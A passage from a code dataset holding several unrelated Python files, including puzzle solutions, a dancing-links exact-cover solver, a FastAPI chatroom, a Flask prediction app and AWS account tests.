scale=1, color=1004, groups=None, flipx=0, flipy=0, level=0, level2=0, zlayer=0, foreground=False):\r\n string = [1, id, 2, pos[0], 3, pos[1]]\r\n if flipx:\r\n string += [4, 1]\r\n if flipy:\r\n string += [5, 1]\r\n if not rot == 0:\r\n string += [6, rot]\r\n if not level == 0:\r\n string += [20, level]\r\n if not color == 1004:\r\n string += [21, color]\r\n if foreground:\r\n string += [24, 5]\r\n if not zlayer == 0:\r\n string += [25, zlayer]\r\n if not scale == 1:\r\n string += [32, scale]\r\n if not groups == None:\r\n string += [57, '.'.join([str(e) for e in groups])]\r\n if not level2 == 0:\r\n string += [61, level2]\r\n return ','.join([str(e) for e in string]) + ';'\r\n\r\ndef move_trigger(pos, length, target, movement):\r\n string = [1, 901, 2, pos[0], 3, pos[1], 10, length, 28, movement[0], 29, movement[1], 30,11,51, target]\r\n return ','.join([str(e) for e in string]) + ';'\r\n\r\n# rotates clockwise\r\ndef rot_trigger(pos, length, target, target2, degrees, easelvl):\r\n if abs(degrees) >= 360:\r\n degrees = degrees%360\r\n times360 = int(degrees/360)\r\n string = [1, 1346, 2, pos[0], 3, pos[1], 10, length, 68, degrees]\r\n if not times360 == 0:\r\n string += [69, times360]\r\n if not easelvl == 1:\r\n string += [30, 11, 85, easelvl]\r\n return ','.join([str(e) for e in string]) + ';'","repo_name":"Metalit/GDRender","sub_path":"GD/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4145243230","text":"import pandas as pd\nimport time\nimport sqlite3\n\nkey = '1yRLGaQk3-9UlopftPr5e8F-X3pKkjwLlZWcTwai6_Ds'\nname = 'RRI+2.0+-+Masterlist'\nurl = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(key, name)\n\ndef create():\n df = pd.read_csv(url)\n df.drop('Number of filled cells', axis=1, inplace=True)\n df.drop('Progress', axis=1, inplace=True)\n df.drop(df.shape[0]-1, inplace=True)\n df.drop(df.shape[0]-1, inplace=True)\n df[\"Microplastic Sizes\"] = pd.to_numeric(df[\"Microplastic Sizes\"], errors=\"coerce\")\n df[\"Year Published\"] = pd.to_numeric(df[\"Year Published\"], errors=\"coerce\")\n df.fillna(\"NA\", inplace=True)\n\n connection = sqlite3.connect(\"database/data.db\")\n df.to_sql(\"masterlist\", connection, if_exists='replace', index=True)\n cur = connection.cursor()\n res = cur.execute(\"SELECT * FROM masterlist LIMIT 1\")\n if res is not None:\n current = time.time()\n print(f\"Database init successfully at {time.ctime(current)}\")\n else:\n print(\"Something went wrong with initing database\")\n connection.close()","repo_name":"Marine-Litter-Research-Inventory/server","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"73509882440","text":"#!/usr/bin/env python3\n\nimport re\nfrom collections import deque\n\n\ndef load_input():\n number_list = 9\n\n data = list()\n commands = list()\n\n pattern = re.compile('move (\\d+) from (\\d+) to (\\d+)')\n\n with open('input') as fd:\n data = [deque() for _ in range(number_list)]\n section = 0\n for line in fd:\n if section == 0:\n if line[1] == '1':\n section = 1\n continue\n for i in range(number_list):\n pos = 4*i+1\n if pos < len(line):\n char = line[pos]\n if char != ' ':\n data[i].appendleft(char)\n else:\n break\n elif section == 1:\n section = 2\n else:\n line = line.strip()\n match = pattern.search(line)\n commands.append([int(match.group(1)), int(match.group(2))-1, int(match.group(3))-1])\n\n return data, commands\n\n\ndef main():\n data, commands = load_input()\n\n # Task 1\n for command in commands:\n for _ in range(command[0]):\n temp = data[command[1]].pop()\n data[command[2]].append(temp)\n\n result = \"\".join([char[-1] for char in data])\n print(\"Result 1: \", result)\n\n # Task 2\n data, commands = load_input()\n for command in commands:\n temp = deque()\n for _ in range(command[0]):\n temp.appendleft(data[command[1]].pop())\n data[command[2]].extend(temp)\n\n result = \"\".join([char[-1] for char in data])\n print(\"Result 2: \", result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"docToolchain/aoc-2022","sub_path":"day05/python/ojuaf/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"71373209802","text":"from typing import Union\nfrom fastapi import FastAPI, HTTPException\nimport os.path\n\nif os.path.isfile('models.py'):\n from models import MessageIn, MessageOut, ChatRoomIn, ChatRoomOut, ChatRoomInfo\nelse :\n from chatroom_project.models import MessageIn, MessageOut, ChatRoomIn, ChatRoomOut, ChatRoomInfo\n\nimport uuid\nfrom datetime import datetime\n\napp = FastAPI()\n\n\nclass Message:\n def __init__(self, author: str, message):\n self.author = author\n self.message = message\n self.uid = str(uuid.uuid4())\n self.date = str(datetime.now())\nclass Chatroom:\n def __init__(self, name: str):\n self.uid = str(uuid.uuid4())\n self.name = name\n self.messages = []\n\nchatrooms: dict[str : Chatroom] = {}\n\n@app.post(\"/message/{room_id}\", tags=['message'])\ndef post_a_message(room_id: str, message: MessageIn):\n if room_id not in chatrooms:\n raise HTTPException(status_code=404, detail=\"Chatroom not found\")\n msg = Message(message.author, message.message)\n chatrooms[room_id].messages.append(MessageOut(uid=msg.uid, author=msg.author, message=msg.message, date=msg.date))\n return \"Message successfully sent!\"\n \n\n@app.get(\"/message/{room_id}\", tags=['message'])\ndef get_messages(room_id: str) -> ChatRoomOut:\n room = chatrooms[room_id]\n return ChatRoomOut(uid= room_id, name= room.name, messages= room.messages)\n\n@app.delete(\"/message/{message_id}\", tags=['message'])\ndef delete_a_message(message_id: str):\n pass\n\n@app.delete(\"/chatroom/{room_id}\", tags=['chatroom'])\ndef delete_chatroom(room_id: str):\n if room_id not in chatrooms:\n raise HTTPException(status_code=404, detail=\"Chatroom not found\")\n chatrooms.pop(room_id)\n return \"Chatroom deleted successfully\"\n \n@app.get(\"/chatroom\", tags=['chatroom'])\ndef get_chatrooms() -> list[ChatRoomInfo]:\n chat_list = []\n for room in chatrooms.values():\n chat_list.append(ChatRoomInfo(uid= room.uid, name= room.name))\n return chat_list\n\n@app.post(\"/chatroom\", tags=['chatroom'])\ndef create_a_chatroom(chatroom: ChatRoomIn):\n room = Chatroom(chatroom.name)\n chatrooms[room.uid] = room\n return ChatRoomInfo(uid= room.uid, name= room.name)\n\n\n","repo_name":"theoliss/Intro_API","sub_path":"chatroom_project/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8524595432","text":"\"\"\"This script implements Knuth's 'dancing links' XDL algorithm for solving\r\nthe exact cover problem by backtrack\"\"\"\r\n\r\n# The basic idea is to represent the problem as a zero-one matrix. \r\n# The rows represent subsets of some set U and the columns represent\r\n# the elements of U, and a 1 in the matrix means set membership.\r\n# The problem is to find a family of subsets of that parition U,\r\n\r\n# that is, to find a set of rows of the matrix so that each column\r\n# contains a 1 in exactly one row of the family. Alternatively,\r\n# one may ask for all such families, as Knuth does.\r\n\r\n# Kunth also considers an extension where some of the columns are\r\n# allowed to contain at most one 1.\r\n\r\n# The \"Dancing Links\" paper is available at\r\n# http://www-cs-faculty.stanford.edu/~uno/preprints.html\r\n\r\nimport time, psyco\r\n\r\nclass ColumnError(Exception):\r\n def __init__(self, value):\r\n self.value = value\r\n def __str__(self):\r\n return repr(self.value)\r\n\r\nclass Node:\r\n \"\"\" A nonzero entry in the membership matrix\"\"\"\r\n def __init__(self,left=None,right=None,up=None,down=None,col=None,row=None):\r\n # all lists are circular in both directions\r\n self.left = left # the column name of the previous 1 in this row\r\n self.right = right # the column name of the next 1 in this row\r\n self.up = up # the row number of the previous 1 in this column\r\n self.down = down # the row number of the next 1 in this column\r\n self.col = col # the name of this column\r\n self.row = row # the number of this row (or possibly 'head')\r\n \r\nclass Column:\r\n \"\"\"The column headers\"\"\"\r\n def __init__(self, next = None, prev = None):\r\n self.prev = prev\r\n self.next = next\r\n self.length = 0 # number of 1's in this column\r\n\r\nclass Dancer:\r\n \"\"\"The main class for dancing links.\r\n\r\n Contains the sparse matrix and the methods for initializing it, backtracking\r\n for a solution or all solutions, and outputting results.\"\"\"\r\n \r\n def __init__(self, primary, matrix, secondary = []):\r\n if primary == []:\r\n raise RunTimeError(\"No primary columns!\")\r\n if matrix == []:\r\n raise RunTimeError(\"No membership matrix\")\r\n self.columns = primary + secondary\r\n for row in matrix:\r\n for col in row[:-1]:\r\n if not col in self.columns:\r\n raise ColumnError(col)\r\n self.nodes = {}\r\n self.headers = {}\r\n self.rows = {}\r\n self.updates = 0\r\n self.solutions = [] \r\n \r\n self.setHeaders(primary, secondary)\r\n self.readRows(matrix) \r\n psyco.bind(self.backTrack) \r\n \r\n def _recorder(self, level, choice):\r\n \r\n # Record solution. Not to be called outside class\r\n \r\n answer = []\r\n rows = self.rows\r\n \r\n for idx in range(0, level+1):\r\n num = choice[idx].row\r\n answer += [rows[num]] \r\n self.solutions.append(answer)\r\n \r\n def report(self):\r\n # Print report. Intended to be called by class user.\r\n pass\r\n \r\n def setHeaders(self, primary, secondary):\r\n \"\"\"Sets up the header dictionary of column headers. The primary columns headers form a\r\n doubly-linked list, but the secondary column headers do not. This is because we do\r\n not require that secondary columns be covered.\"\"\"\r\n \r\n headers = self.headers\r\n nodes = self.nodes\r\n headers['root'] = Column()\r\n curCol = 'root'\r\n for p in primary:\r\n headers[curCol].next = p\r\n headers[p] = Column(prev = curCol)\r\n curCol = p\r\n nodes['head', p] = Node(up = 'head', down = 'head', col = curCol, row = 'head')\r\n headers[curCol].next = 'root'\r\n headers['root'].prev = curCol\r\n for s in secondary:\r\n headers[s] = Column(prev = s, next = s)\r\n nodes['head', s] = Node(up = 'head', down = 'head', col = curCol, row = 'head')\r\n\r\n def readRows(self, matrix):\r\n \"\"\"Initialize the membership matrix.\r\n\r\n The input is a list of rows. The rows are simply the names of the columns with a\r\n 1 in this row, except that the last entry in each row is a symbolic name for the row.\r\n The columns must be listed in the same order as in the primary\r\n and secondary inputs, primary columns first.\"\"\"\r\n\r\n nodes = self.nodes\r\n rows = self.rows\r\n headers = self.headers\r\n \r\n for rowNum, row in enumerate(matrix):\r\n rows[rowNum] = row[-1]\r\n for i, c in enumerate(row[:-1]):\r\n c = row[i]\r\n h = nodes['head', c]\r\n next = row[i+1] # wrong for the last 1 in the row\r\n \r\n # h.up points to last element in the column\r\n nodes[rowNum, c] = Node(row[i-1],next, h.up, 'head', c, rowNum)\r\n \r\n # hook the new node in at the bottom of the column\r\n # note that this will handle the first node in the column\r\n \r\n nodes[h.up, c].down = rowNum \r\n h.up = rowNum\r\n headers[c].length += 1\r\n \r\n # hook first and last 1s in row together\r\n \r\n nodes[rowNum, c].right = row[0]\r\n nodes[rowNum, row[0]].left = row[-2]\r\n\r\n def backTrack(self, findAll):\r\n \"\"\"The main routine.\r\n\r\n Returns the number of solutions found\"\"\"\r\n \r\n # Knuth's comments in his dance program say, in part, \"Our strategy for generating all\r\n # exact covers will be to repeatedly choose always the column that appears to be\r\n # hardest to cover, namely, the column with the shortest list, from all columns that\r\n # still need to be covered. And we explore all possibilities via depth-first serach.\r\n # ...\r\n # The basic operation is 'covering a column.' This means removing it from the list of\r\n # columns needing to be covered, and 'blocking' its rows: removing nodes from other\r\n # lists whenever they belong to a row of a node in this column's list.\"\r\n #\r\n # This implementation is a little clunky, since I've translated Knuth's dance.c\r\n # program as literally as I can, and python lacks a goto. I've simulated gotos\r\n # by setting a state variable. Many of the comments are copied from Knuth.\r\n\r\n level = 0 # number of choices in current partial solution\r\n choice = {}\r\n # the list of such choices, for printing solution, or backtracking\r\n count = 0 # number of solutions\r\n \r\n state = 'forward'\r\n nodes = self.nodes\r\n headers = self.headers\r\n root = headers['root']\r\n \r\n while True:\r\n\r\n # forward:\r\n\r\n if state == 'forward':\r\n # Set best to best column for branching (one with fewest elements)\r\n minLength = 10000000 # infinity\r\n cur = root.next\r\n \r\n while cur != 'root':\r\n h = headers[cur]\r\n if h.length < minLength:\r\n best = cur\r\n minLength = h.length\r\n cur = h.next\r\n self.cover(best)\r\n choice[level] = nodes[nodes['head', best].down, best]\r\n currNode = choice[level]\r\n\r\n #advance:\r\n\r\n if currNode.row == 'head':\r\n state = 'backup' # goto backup\r\n else:\r\n \r\n #cover all other columns of currNode\r\n\r\n pp = nodes[currNode.row, currNode.right]\r\n while pp.col != best:\r\n self.cover(pp.col) \r\n pp = nodes[pp.row, pp.right]\r\n if headers['root'].next == 'root':\r\n\r\n # record solution\r\n \r\n self._recorder(level, choice)\r\n count += 1\r\n \r\n if findAll:\r\n state = 'recover' # goto recover\r\n else:\r\n break # done\r\n else:\r\n level += 1\r\n state = 'forward'\r\n continue # goto forward\r\n\r\n #backup:\r\n\r\n if state == 'backup':\r\n self.uncover(best)\r\n if level == 0:\r\n break # done\r\n level -= 1\r\n currNode = choice[level]\r\n best = currNode.col\r\n\r\n #recover: ( backup falls through to here ) \r\n\r\n if state in ('backup', 'recover'):\r\n \r\n # uncover all other columns of currNode\r\n # We included left links, thereby making the list doubly linked, so that columns\r\n # would be uncovered in the correct LIFO order in this part of the program. -- Knuth\r\n \r\n pp = nodes[currNode.row, currNode.left]\r\n while pp.col != best:\r\n self.uncover(pp.col)\r\n pp = nodes[pp.row, pp.left]\r\n currNode = choice[level] = nodes[currNode.down, currNode.col]\r\n state = 'advance' # goto advance\r\n return count\r\n\r\n def cover(self, col):\r\n \"\"\"When a row is blocked, it leaves all lists except the list of the column that is being\r\n covered. Thus, a node is never removed fom a list twice. -- Knuth\"\"\"\r\n \r\n updates = 1\r\n nodes = self.nodes\r\n headers = self.headers\r\n left = headers[col].prev\r\n right = headers[col].next\r\n headers[left].next = right # remove col from the headers list\r\n headers[right].prev = left\r\n rr = nodes['head', col].down # next row in column \r\n while nodes[rr, col].row != 'head':\r\n nn = nodes[rr, nodes[rr, col].right] # next column in row rr\r\n while nn.col != col:\r\n uu = nn.up\r\n dd = nn.down\r\n cc = nn.col\r\n nodes[uu, cc].down = dd\r\n nodes[dd, cc].up = uu # remove node from the column\r\n headers[cc].length -= 1\r\n try:\r\n nn = nodes[nn.row, nn.right] #next column\r\n except KeyError:\r\n raise KeyError((nn.row, nn.col))\r\n updates += 1\r\n rr = nodes[rr, col].down # next row\r\n self.updates += updates\r\n\r\n def uncover(self, col):\r\n \"\"\"Uncovering is done in precisely the reverse order. The pointers thereby execute an\r\n exquisitely choreographed dance which returns them almost amgically to their former\r\n state. -- Knuth\"\"\"\r\n\r\n nodes = self.nodes\r\n headers = self.headers\r\n rr = nodes['head', col].up # next row in column\r\n while nodes[rr, col].row != 'head':\r\n nn = nodes[rr, nodes[rr, col].left] # next column in row rr\r\n while nn.col != col:\r\n uu = nn.up\r\n dd = nn.down\r\n cc = nn.col\r\n nodes[uu, cc].down = nodes[dd, cc].up = nn.row\r\n headers[cc].length += 1\r\n nn = nodes[nn.row, nn.left] #next column\r\n rr = nodes[rr, col].up # next row\r\n left = headers[col].prev\r\n right = headers[col].next\r\n headers[left].next = headers[right].prev = col #put col back into headers list\r\n \r\n def report(self):\r\n\r\n # Print report. Intended to be called by class user.\r\n \r\n return self.solutions\r\n \r\n def solve(self, findAll = True):\r\n start = time.clock()\r\n count = self.backTrack(findAll)\r\n elapsed = time.clock() - start\r\n return count, elapsed, self.updates\r\n \r\n","repo_name":"rdasxy/kenken","sub_path":"misc/dance1.py","file_name":"dance1.py","file_ext":"py","file_size_in_byte":12291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"36636580315","text":"import logging as log\nimport optparse as op\nimport os\nimport shutil\n\nif \"__main__\" == __name__:\n # SETUP LOGGER BEFORE IMPORTS SO THEY CAN USE THESE SETTINGS\n log.basicConfig(filename=\"poster-to-season.log\",\n filemode=\"w\",\n format=\"%(asctime)s %(filename)15.15s %(funcName)15.15s %(levelname)5.5s %(lineno)4.4s %(message)s\",\n datefmt=\"%Y%m%d %H%M%S\"\n )\n log.getLogger().setLevel(log.DEBUG)\n\n\ndef parse_command_line() -> op.Values:\n parser = op.OptionParser()\n parser.add_option(\"-p\", \"--poster\",\n dest=\"poster_file\",\n help=\"File to use as poster for the season.\"\n )\n parser.add_option(\"-s\", \"--season\",\n dest=\"season_dir\",\n help=\"Directory the videos for the season are located.\"\n )\n options, _ = parser.parse_args()\n\n if not options.poster_file:\n parser.error(\"Filename of poster is missing.\")\n if not options.season_dir:\n parser.error(\"Season directory is missing.\")\n\n if not os.path.isfile(options.poster_file):\n parser.error(f\"Cannot find image file {options.poster_file}.\")\n if not os.path.isdir(options.season_dir):\n parser.error(f\"Cannot find directory {options.season_dir}.\")\n\n return options\n\n\ndef main() -> None:\n options: op.Values = parse_command_line()\n dot_idx: int = options.poster_file.rfind(\".\")\n # FILE EXTENSION OF POSTER (INCLUDING THE PERIOD)\n poster_ext: str = options.poster_file[dot_idx:]\n\n for file_name in sorted(os.listdir(options.season_dir)):\n if file_name.endswith(\".mp4\") or file_name.endswith(\".mkv\"):\n print(f\"Copying poster for {file_name}\")\n # build poster filename\n poster_file_name: str = f\"{file_name[:-4]}{poster_ext}\"\n poster_full_path: str = os.path.join(options.season_dir, poster_file_name)\n log.debug(f\"Copying {options.poster_file} to {poster_full_path}.\")\n shutil.copyfile(options.poster_file, poster_full_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alkirej/python-utils-for-media-server","sub_path":"src/poster_to_season.py","file_name":"poster_to_season.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25295295597","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(2 * (10 ** 5))\nInf = INF = float(\"INF\")\n\n\ndef solve(N: int, A: \"List[int]\", B: \"List[int]\"):\n links = defaultdict(list)\n for a, b in zip(A, B):\n links[a].append(b)\n links[b].append(a)\n\n lst = []\n\n def dfs(u, p):\n lst.append(u)\n for v in sorted(links[u]):\n if v == p:\n continue\n dfs(v, u)\n lst.append(u)\n\n dfs(1, None)\n print(*lst)\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n A = [int()] * (N - 1) # type: \"List[int]\"\n B = [int()] * (N - 1) # type: \"List[int]\"\n for i in range(N - 1):\n A[i] = int(next(tokens))\n B[i] = int(next(tokens))\n solve(N, A, B)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dmiyakawa/atcoder-workspace","sub_path":"abc213/D/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40850672600","text":"#!/usr/bin/env python3 \n\n# -- Imports\nimport argparse\n#import json\n#import sys\n#import getpass\n#import getopt\n#import getpass\n#import json\n#import os\n#import re\n#import sys\n#import urllib\n#import urllib.parse\n#import urllib.request\n#import xml.etree.ElementTree as ET\n#import subprocess\n#import threading\n#import queue\n# -- Input args\nparser = argparse.ArgumentParser(description='Argparse example')\nparser.add_argument('-d','--dir', help='Some XML file', required=True)\nargs = parser.parse_args()\n\n\n\nimport sys\nimport hashlib\n\ndef hash(file):\n\t# BUF_SIZE is totally arbitrary, change for your app!\n\tBUF_SIZE = 65536 # lets read stuff in 64kb chunks!\n\t#md5 = hashlib.md5()\n\tsha1 = hashlib.sha1()\n\twith open(file, 'rb') as f:\n\t\twhile True:\n\t\t\tdata = f.read(BUF_SIZE)\n\t\t\tif not data:\n\t\t\t\t\tbreak\n\t\t\t#md5.update(data)\n\t\t\tsha1.update(data)\n\treturn sha1.hexdigest()\n\nimport os\nfor root, dirs, files in os.walk(args.dir):\n for file in files:\n path = os.path.join(root, file)\n np = os.path.join(root,\"{}.{}\".format(hash(path),os.path.splitext(path)[1]))\n print(\"{} --> {}\".format(path,np))\n os.rename(path,np)\n\n","repo_name":"mikrofyr/playground","sub_path":"usr/lib/python/misc/uniq.py","file_name":"uniq.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"39754147743","text":"from flask import Flask, request, render_template,jsonify\r\nfrom flask_cors import CORS,cross_origin\r\nfrom src.pipeline.predict_pipeline import CustomData, PredictPipeline\r\nimport pandas as pd\r\n\r\napplication = Flask(__name__)\r\n\r\napp = application\r\n\r\n@app.route('/')\r\n@cross_origin()\r\ndef home_page():\r\n return render_template('index.html')\r\n\r\n@app.route('/predict',methods=['GET','POST'])\r\n@cross_origin()\r\ndef predict_datapoint():\r\n if request.method == 'GET':\r\n return render_template('index.html')\r\n else:\r\n Order_date = request.form['Order_date']\r\n Order_time= request.form['Order_time']\r\n Time_order_picked = request.form['Time_order_picked']\r\n\r\n data = CustomData(\r\n Delivery_person_Age = float(request.form.get('Delivery_person_Age')),\r\n Delivery_person_Ratings = float(request.form.get('Delivery_person_Ratings')),\r\n Restaurant_latitude = float(request.form.get('Restaurant_latitude')),\r\n Restaurant_longitude = float(request.form.get('Restaurant_longitude')),\r\n Delivery_location_latitude = float(request.form.get('Delivery_location_latitude')),\r\n Delivery_location_longitude = float(request.form.get('Delivery_location_longitude')),\r\n Weather_conditions = request.form.get('Weather_conditions'),\r\n Road_traffic_density= request.form.get('Road_traffic_density'),\r\n Vehicle_condition = request.form.get('Vehicle_condition'),\r\n Type_of_order = request.form.get('Type_of_order'),\r\n Type_of_vehicle = request.form.get('Type_of_vehicle'),\r\n multiple_deliveries = request.form.get('multiple_deliveries'),\r\n Festival= request.form.get('Festival'),\r\n City = request.form.get('City'),\r\n Order_month = int(pd.to_datetime(Order_date,format=\"%Y-%m-%dT%H:%M\").month),\r\n Order_day = int(pd.to_datetime(Order_date,format=\"%Y-%m-%dT%H:%M\").day),\r\n Order_hour= int(pd.to_datetime(Order_time,format=\"%Y-%m-%dT%H:%M\").hour),\r\n Order_min = int(pd.to_datetime(Order_time,format=\"%Y-%m-%dT%H:%M\").minute),\r\n Hour_order_pk = int(pd.to_datetime(Time_order_picked,format=\"%Y-%m-%dT%H:%M\").hour),\r\n Min_order_pk = int(pd.to_datetime(Time_order_picked,format=\"%Y-%m-%dT%H:%M\").minute)\r\n )\r\n\r\n pred_df = data.get_data_as_dataframe()\r\n \r\n print(pred_df)\r\n\r\n predict_pipeline = PredictPipeline()\r\n pred = predict_pipeline.predict(pred_df)\r\n results = round(pred[0],2)\r\n return render_template('result.html',results=results,pred_df = pred_df)\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"acaaattunde2012/Ecommerce-Delivery-Time-Predictor-With-Full-Deployment","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16389055222","text":"# http://www.pythonchallenge.com/pc/return/italy.html\n\nimport Image\nim = Image.open('wire.png')\nim_new = Image.new(im.mode, (100, 100))\ndata = list(im.getdata())\nidx = 0\nx = y = top = left = 0\nbottom = right = 99\ndirection = 'R' # R=right, L=left, D=down, U=up\nwhile idx < 10000:\n im_new.putpixel((x,y), data[idx])\n idx += 1\n if direction == 'R':\n if x == right:\n top += 1\n y += 1\n direction = 'D'\n else:\n x += 1\n elif direction == 'D':\n if y == bottom:\n right -= 1\n x -= 1\n direction = 'L'\n else:\n y += 1\n elif direction == 'L':\n if x == left:\n bottom -= 1\n y -= 1\n direction = 'U'\n else:\n x -= 1\n elif direction == 'U':\n if y == top:\n left += 1\n x += 1\n direction = 'R'\n else:\n y -= 1\nim_new.show()\n","repo_name":"haiwenzhu/pythonchallenge","sub_path":"14/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"25418971122","text":"import os\nimport unittest\n\nfrom zope import component\n\nfrom ..testing import AWS_ACCOUNT_INTEGRATION_LAYER\nfrom ..interfaces import IAccount\nfrom ..account import Account, account_factory\nfrom ..session import Session\n\n\nclass IntegrationTestAWSAccountAccount(unittest.TestCase):\n\n level = 2\n\n def setUp(self):\n self.session_kwargs = {'aws_access_key_id': os.environ.get('AWS_ACCESS_KEY_ID'),\n 'aws_secret_access_key': os.environ.get('AWS_SECRET_ACCESS_KEY')}\n self.assume_role_kwargs = {'sts_method': 'assume_role',\n 'RoleArn': os.environ.get('AWS_ASSUME_ROLE'),\n 'RoleSessionName': 'testing_assume_role_for_cs_aws_account_package'\n }\n self.session = Session(**self.session_kwargs)\n\n def test_account_id(self):\n acct = Account(self.session)\n self.assertGreater(len(acct.account_id()), 0)\n\n def test_account_alias(self):\n acct = Account(self.session)\n self.assertGreater(len(acct.alias()), 0)\n\n def test_account_aliases(self):\n acct = Account(self.session)\n self.assertEqual(len(acct._cache_aliases), 0)\n self.assertGreater(len(acct.aliases()), 0)\n self.assertEqual(len(acct._cache_aliases), 1)\n\n def test_account_session(self):\n acct = Account(self.session)\n self.assertIs(acct.session(), self.session)\n\n def test_caching_factory(self):\n s1 = account_factory(SessionParameters=self.session_kwargs)\n s2 = account_factory(SessionParameters=self.session_kwargs)\n self.assertIs(s1, s2)\n\n\nclass IntegrationTestAWSAccountAccountZCA(unittest.TestCase):\n layer = AWS_ACCOUNT_INTEGRATION_LAYER\n\n def setUp(self):\n self.session_kwargs = {'aws_access_key_id': os.environ.get('AWS_ACCESS_KEY_ID'),\n 'aws_secret_access_key': os.environ.get('AWS_SECRET_ACCESS_KEY')}\n\n def test_account_factories(self):\n s = component.createObject(u\"cs.aws_account.session\", SessionParameters=self.session_kwargs)\n a = component.createObject(u\"cs.aws_account.account\", s)\n self.assertTrue(IAccount.providedBy(a))\n a1 = component.createObject(u\"cs.aws_account.cached_account\", SessionParameters=self.session_kwargs)\n self.assertTrue(IAccount.providedBy(a1))\n a2 = component.createObject(u\"cs.aws_account.cached_account\", SessionParameters=self.session_kwargs)\n self.assertIs(a1, a2)\n","repo_name":"CrowdStrike/cs.aws_account","sub_path":"cs/aws_account/tests/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"37141625279","text":"\"\"\"\ninput :\n7 7\n#######\n#...RB#\n#.#####\n#.....#\n#####.#\n#O....#\n#######\n\noutput :\n5\n\"\"\"\nimport sys\nfrom collections import deque\nsys.stdin = open(\"input.txt\", \"r\")\ninput = sys.stdin.readline\n\n\ndef move_ball(y, x, i):\n mov_cnt = 0\n dy = move[i][0]\n dx = move[i][1]\n while True:\n y += dy\n x += dx\n mov_cnt += 1\n\n if board[y][x] == '#':\n y -= dy\n x -= dx\n mov_cnt -= 1\n break\n elif board[y][x] == 'O':\n break\n\n return y, x, mov_cnt\n\n\ndef bfs():\n que = deque()\n que.append([sry, srx, sby, sbx, 0])\n visited[sry][srx][sby][sbx] = True\n\n while que:\n cry, crx, cby, cbx, mov_cnt = que.popleft()\n for i in range(4):\n nry, nrx, rmov_num = move_ball(cry, crx, i)\n nby, nbx, bmov_num = move_ball(cby, cbx, i)\n\n if board[nby][nbx] == 'O': continue\n if board[nry][nrx] == 'O':\n print(mov_cnt + 1)\n return\n\n if [nry, nrx] == [nby, nbx]:\n if rmov_num > bmov_num:\n nry -= move[i][0]\n nrx -= move[i][1]\n else:\n nby -= move[i][0]\n nbx -= move[i][1]\n\n if not visited[nry][nrx][nby][nbx]:\n visited[nry][nrx][nby][nbx] = True\n que.append([nry, nrx, nby, nbx, mov_cnt + 1])\n\n print(-1)\n return\n\n\nif __name__ == \"__main__\":\n R, C = map(int, input().rstrip().split())\n board = []\n for _ in range(R):\n board.append(list(input().rstrip()))\n\n for r in range(R):\n for c in range(C):\n if board[r][c] == 'R':\n sry, srx = r, c\n elif board[r][c] == 'B':\n sby, sbx = r, c\n elif board[r][c] == 'O':\n Oy, Ox = r, c\n\n visited = [[[[False for _ in range(C)] for _ in range(R)] for _ in range(C)] for _ in range(R)]\n move = [[0, 1], [1, 0], [0, -1], [-1, 0]]\n bfs()\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_summer_study_for_SUAPC/day12_15653_kim.py","file_name":"day12_15653_kim.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4370893958","text":"import cv2\nimport os, glob\nimport pandas as pd\nimport numpy as np\nimport holoviews as hv\nimport FreezeAnalysis_Functions as fz\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nimport math\nimport random\nimport matplotlib.colors as mcolors\n\ndef convert_min_to_sec(min, sec):\n min_to_sec = int(min) * 60\n total_sec = min_to_sec + float(sec)\n return total_sec\n\ndef convert_sec_to_frames(sec, fps):\n frame_num = float(sec) * fps\n return frame_num\n\ndef break_down_timestamp(timestamp):\n \"\"\"_summary_\n\n Args:\n timestamp (str): _description_\n\n Returns:\n int: _description_\n int: _description_\n \"\"\"\n min = int(timestamp.split(\":\")[0])\n sec = int(timestamp.split(\":\")[1])\n return min, sec\n\ndef create_timestamps(start_timestamp: str, num_events: int, step: int, fps: float, units_steps, units_timestamp):\n \"\"\"_summary_\n\n Args:\n start_timestamp (str): when to start the timestamps\n num_events (int): number of events\n step (int): step size, how many frames to skip\n fps (float): frames per 